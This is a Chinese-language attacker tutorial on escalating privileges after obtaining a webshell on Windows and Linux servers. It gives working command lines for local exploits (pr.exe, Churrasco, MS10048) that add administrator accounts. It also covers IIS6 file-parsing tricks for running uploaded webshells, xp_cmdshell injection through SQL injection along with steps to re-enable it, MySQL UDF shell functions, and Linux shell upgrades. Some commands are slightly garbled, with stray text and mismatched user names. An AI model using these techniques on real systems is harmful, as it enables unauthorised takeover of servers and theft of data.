服务器权限提升

CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'

当我们拿到webshell之后，下一步该干什么？

提升权限啊！！！

0x00【基础介绍】

通过上传、SQL注入、任意代码执行等最初的漏洞利用，攻击者将获得一定的访问权限。接着，攻击者将逐步探查其破坏的系统来获得比最初更多的权限，以期从其他账户访问更多敏感信息，或甚至获得对某个系统的完全管理控制。当攻击者一这种方式扩大其最初的未经授权访问权限时，我们将其行为称之为权限提升攻击。
     水平权限提升：攻击者在具有相似权限的账户中横向移动。
     垂直权限提升：攻击者首先从被攻击的用户账户开始并能够将其拥有的单一用户权限扩大或者提升至完全管理权限或者“根”权限时，这类攻击为垂直权限提升。
分类：
     Windows权限提升
     Linux权限提升

0x01【Windows权限提升】

1、操作系统漏洞提权
（1）systeminfo 查看修补的补丁编号

（2）PR ---- pr.exe   提权Windows跟踪注册表项的ACL权限提升漏洞
      Windows管理规范（WMI）提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程，同一帐号下运行的两 个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌，如果攻击者可以以 NetworkService或LocalService帐号访问计算机，攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到 了SYSTEM令牌，就可以获得SYSTEM权限的提升。
     使用方法：
       pr.exe “gets.exe $local”

     pr.exe “net user admin1 admin1 /add & net localgroup administrators admin /add”

（3）Churrasco.exe是Windows2003系统下的一个本地提权漏洞，通过此工具可以以SYSTEM权限执行命令，从而可以达到添加用户的目的。

     使用方法：

      Churrasco.exe "net user admin1 admin1 /add && net localgroup administrators admin1 /add"

     补丁名： kb952004

（4） 巴西烤肉 用法和pr.exe一样
     
（5） IIS6溢出 ---- iis6.exe
      在 Windows 2003下 IIS 6.0有两个漏洞。以下是我在网上找的资料：

IIS解析漏洞1：
　　在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹，其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp，那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。
 IIS解析漏洞2：
　　网站上传图片的时候，将网页木马文件的名字改成“*.asp;.jpg”，也同样会被 IIS 当作 asp 文件来解析并执行。例如上传一个图片文件，名字叫“vidun.asp;.jpg”的木马文件，该文件可以被当作 asp 文件解析并执行。

（6） LPK劫持 ---- lpk.dll

（7） MS10048

  Windows中的win32k.sys内核驱动中的xxxCreateWindowEx函数在处理某些回调参数时存在内核级权限提升漏洞。在正常情况下 从用户空间调用CreateWindow时，会执行NtUserCreateWindowEx内核函数，xxxCreateWindowEx位于内核端调 用栈上的临近位置。之后的函数会检查回调函数（或钩子）并调用xxxCallHook将注册的回调函数分发到用户空间。

用于将参数传送回创建窗口的进程的机制存在漏洞。这些参数通过栈传送到了用户空间，并在执行了回调函数后被内核重用。如果回调函数将hParent参数重置为类似于0xffffffff或0xfffffffe的伪句柄值，内核就会崩溃。

成功利用这个漏洞的攻击者可以执行任意内核态代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。

使用方法：

USE MS10048.EXE NET USER XX XX /ADD

USE MS10048.EXE MUMA.EXE
第一个是X64位，第二个是X86

（8） CVE-2014-4113
（9） CVE-2013-3660
（10） CVE-2013-5065

根据没有修补的补丁号码，到网上找利用程序，进行利用。

2、第三方服务器提权
首先需要确定目标主机存在的第三方服务器：

看进程 tasklist
看端口 netstat -ant
看文件
FTP提权

serv-u ftp 提权
MSSQL提权

[align=justify]（1）MSSQL默认运行在system权限上，可以通过xp_cmdshell组件（起桥梁作用）执行系统命令，执行权限继承system权限。[/align]
      条件：拿到数据库账号密码，且该账号是DBA权限
（2）关于xp_cmdshell：
     EXEC xp_cmdshell 'whoami';
    不但可以在拿到webshell之后，使用webshell连接数据库执行这个SQL语句，还可以在SQL注入的时候在URL上直接使用xp_cmdshell，因为mssql可以多语句执行注入，例如： index.aspx?id=1;EXEC
xp_cmdshell ‘net user administrator 123456';--
（3）恢复xp_cmdshell组件：
     SQL Server 阻止了对组件'xp_cmdshell'的过程 'sys.xp_cmdshell'的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以使用sp_configure启用 xp_cmdshell。

USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE

关闭此组件只需将”EXEC sp_configure 'xp_cmdshell', 1“ 中1 改为0

MySQL提权

UDF提权
Mof提权

环境：web应用服务器权限较低
              MySQL system权限

（1）什么是UDF？
  UDF顾名思义，就是User defined Function，用户定义函数。我们知道，MySQL本身支持很多内建的函数，此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。

（2）UDF提权利用过程：

导入udf.dll到服务器指定目录。

          mysql版本大于等于5.1 udf.dll 需要导入到plugin_dir目录的，plugin_dir在mysql安装目录下的lib/plugin目录下，默认目录不存在，创建目录。mysql安装目录select @@basedir;
          mysql版本小于5.1 udf.dll 需要导入到c:\windows\ 目录

使用SQL语句创建功能函数shell 

CREATE FUNCTION shell
a994
RETURNS STRING SONAME 'udf.dll'

执行mysql语句调用新创建的函数   

select shell(‘cmd','whoami')

删除创建的函数

drop function shell：

0x02 【Linux权限提升】

一、操作系统漏洞提权
1、获取操作系统版本号
获取发行版本：

cat /etc/issue
cat /etc/*-release
cat /etc/lsb_release
cat /etc/redhat-release

获取内核版本：

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

2、搜索exp，gcc编译源代码，提升用户权限
3、反弹shell
4、尝试利用

获得交互式bash

python -c 'import pty; pty.spawn("/bin/bash")'

二、第三方服务器提权

1、ps aux 找到哪个服务是root运行的
2、mysql root 权限 udf提权
利用：
ssh反向连接
ssh免密码登录
windows webshell system权限 （tomcat、apache）